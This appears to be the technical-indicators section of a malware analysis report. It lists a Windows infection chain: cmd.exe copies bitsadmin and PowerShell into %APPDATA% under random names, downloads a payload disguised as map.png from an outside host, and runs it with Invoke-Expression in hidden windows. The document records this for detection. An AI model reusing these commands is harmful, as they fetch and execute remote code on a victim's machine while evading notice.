Technical Information
- '%APPDATA%\jdexy.exe' /transfer qThJjB /download https://nvcssllc.com/nalsica/02454651205/map.png %APPDATA%\map.png
- '%APPDATA%\zjdexy.exe' -c &{$YC=gc %APPDATA%\map.png| Out-String; Invoke-Expression $YC }
- %APPDATA%\zjdexy.exe
- %APPDATA%\jdexy.exe
- 'nv###llc.com':443
- DNS ASK nv###llc.com
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zJdEXy.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\JdEXy.exe' (with hidden window)
- '%APPDATA%\jdexy.exe' /transfer qThJjB /download https://nvcssllc.com/nalsica/02454651205/map.png %APPDATA%\map.png' (with hidden window)
- '%APPDATA%\zjdexy.exe' -c &{$YC=gc %APPDATA%\map.png| Out-String; Invoke-Expression $YC }' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %APPDATA%\zJdEXy.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\JdEXy.exe